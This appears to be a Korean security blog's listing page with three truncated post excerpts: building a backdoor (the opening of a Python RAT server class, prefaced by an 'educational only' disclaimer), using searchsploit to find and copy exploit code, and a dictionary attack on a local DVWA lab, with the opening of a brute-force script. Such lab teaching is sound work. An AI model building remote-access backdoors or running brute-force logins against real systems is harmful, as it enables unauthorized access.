이 소프트웨어는 교육 목적으로만 사용됩니다! 누구에게도 피해를 입히는 데 사용하지 마십시오! 내 응용 프로그램을 사용하면 귀하는 모든 규칙에 자동으로 동의하고 귀하의 행동에 대한 책임을 집니다! 법률 위반은 심각한 결과를 초래할 수 있습니다! 개발자 hyomo는 이 프로그램으로 인한 오용이나 손상에 대해 책임지지 않습니다. 오늘은 백도어를 만들어 보도록 하겠습니다 server.pyimport socket, os class RAT_SERVER: def __init__(self, host, port): self.host = host self.port = port def build_connection(self): global client, addr, s s = socket.socket(socket.AF_INE..
모의해킹
1. searchsploit이란 우리가 모의해킹을 할 때 보안 취약점과 exploit검색하는 명령어 도구입니다. 정보 수집과 보안 분석에 유용하게 쓸 수 있습니다. exploitdb에서 검색하기 귀찮을 때 유용합니다. 물론 여기 있는 정보들은 대부분 exploitdb에서 가져온 정보들입니다. 칼리리눅스를 사용하고 있다면 searchsploit 명령어로 쓸 수 있습니다. > searchsploit 예를 들어 이렇게 활용할 수 있습니다 PATH: 취약점 공격코드들 경로 Exploit Title: 취약점 제목들 url로 정보를 확인하고 싶으면 -w 옵션을 주시면 됩니다. exploit 코드를 가져올려면 -m 를 입력하면 됩니다.
오늘은 Dictionary Attack을 실습해 볼 것입니다 아무렇게나 입력하고 로그인 버튼을 눌러보면 이름, 비밀번호가 맞지 않다고 나옵니다. 버프스위트로 해당 패킷을 잡아보면 이렇게 나옵니다. 저는 파이썬 requests 모듈을 활용하여 실습을 해볼 겁니다. main.py import requests from fake_useragent import UserAgent def Attack(): URL = "http://10.211.55.7/DVWA/vulnerabilities/brute/" cookies = { "PHPSESSID" : "er8uv6cfg8ks2dua60gnof174q", "security" : "low" } params = { 'username' : '', 'password' : '',..
